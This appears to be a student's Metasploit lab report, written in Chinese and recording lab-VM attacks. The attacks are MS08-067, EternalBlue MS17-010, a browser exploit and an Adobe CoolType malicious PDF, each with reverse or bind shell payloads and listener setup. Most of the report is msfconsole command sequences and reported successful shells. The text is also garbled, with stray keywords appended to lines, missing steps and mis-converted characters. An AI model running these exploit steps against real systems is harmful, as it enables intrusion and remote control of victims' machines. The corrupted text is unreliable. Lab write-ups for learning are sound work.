1.實踐內容(3.5分)linux
本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體我嘗試了:web
1.3 一個針對客戶端的攻擊:Adobe(成功不惟一);shell
1.4 成功應用輔助模塊:scanner/http/options(成功,不惟一)。windows
2.一些問題api
encode:對道具進行包裝瀏覽器
免殺技術吧,如今咱們還不能很好地實現真正意義上的免殺;還有就是咱們製做的後門程序都很簡單,,通常人看都看出來是不正經軟件了。服務器
1.打開kali與Linux Metasploit,測試兩虛擬機之間可否ping通:
網絡
2.查看以前寫好的腳本
tcp
3.在命令行輸入msfconsole -r msfcli.rc
運行在以前我已經寫好的腳本,攻擊成功
學習
1.打開WinXPEnSP3虛擬機。將其網絡鏈接方式改成NAT
模式後重啓。測試其與kali可否相互ping通:
2.切換到kali虛擬機界面,輸入msfconsole
啓動msf。啓動後輸入search ms08_067
,出現了一條漏洞信息。
3.輸入use windows/smb/ms08_067_netapi
:
4.輸入show payload
,出現載荷列表,發現有100多個載荷
5.輸入set payload generic/shell_reverse_tcp
設置載荷。
6.輸入show options
查看參數。發現源IP和目的IP還沒設置,輸入set PHOST 192.168.10.12
和set LHOST 10.10.10.128
設定參數
7.輸入run
開始攻擊。攻擊失敗。(這裏好多同窗都成功了哎,,不知道是否是下載途徑不同的緣由。)
search ms11_050
,查詢跟漏洞相關的信息use exploit/windows/smb/ms17_010_eternalblue
show payloads
,查詢有哪些載荷set payload generic/shell_reverse_tcp
設定輸入載荷show options
,查看有哪些參數須要設置。發現還空缺的參數是LHOST和RHOST。輸入set RHOST 10.10.10.132
,set LHOST 10.10.10.128
設定參數7.輸入exploit
開始攻擊,執行一段時間後卡在了以下界面:
[攻擊方IP地址]/*
,而後才能回連成功。9.在靶機上打開IE瀏覽器,輸入10.10.10.128/5214
10.回到kali,輸入ipconfig
指令和pwd
指令進行測驗,鏈接成功:
set payload windows/metsvc_bind_tcp
12.輸入參數後鏈接失敗:
13.再換一個payload:windows/x64/shell_bind_tcp
,這回在Win7打開IE後輸入10.10.10.128
,回連成功
search adobe
,查詢跟漏洞相關的信息use windows/fileformat/adobe_cooltype_sing
show payloads
,查詢有哪些載荷set payload windows/meterpreter/reverse_tcp
設定輸入載荷show options
,查看有哪些參數須要設置。發現還空缺的參數是LHOST和RHOST。輸入set RHOST 10.10.10.132
,set LHOST 10.10.10.128
設定參數6.提示在.msf/local
下生成了pdf。
8.在msf輸入use exploit/multi/handler
和set payload windows/meterpreter/reverse_tcp
後進入監聽模式,設定LHOSTset LHOST 10.10.10.128
,輸入exploit開始監聽。這時候切換到Win7打開該pdf,回連成功:
search auxiliary
查找輔助模塊,發現有1000多個。scanner/http/options
-1.在攻擊靶機爲WinXPEnSP3的ms08_067漏洞以前,測試可否ping通,發現不能ping通。
解決方法:這裏是由於我根據教材的環境配置把XP設置爲了內網,而kali在DMZ區,因此須要啓動網關服務器才能夠ping通。所以在這裏須要啓動個人第三臺虛擬機Linux Metasploit
2.在實驗中,有時候靶機並不存在咱們想要攻擊的漏洞,一個一個試又要花費很長的時間。在同窗的幫助下,我發現了能夠用nmap來提早檢測漏洞是否存在。不過這已是我在作完全部實驗步驟以後才知道的了。我拿了一個我攻擊失敗了的漏洞(靶機爲WinXPEnSP3的ms08_067)來進行嘗試,在命令行輸入nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.10.128
,發現沒有該漏洞相關的字段,不過能夠看到目標系統。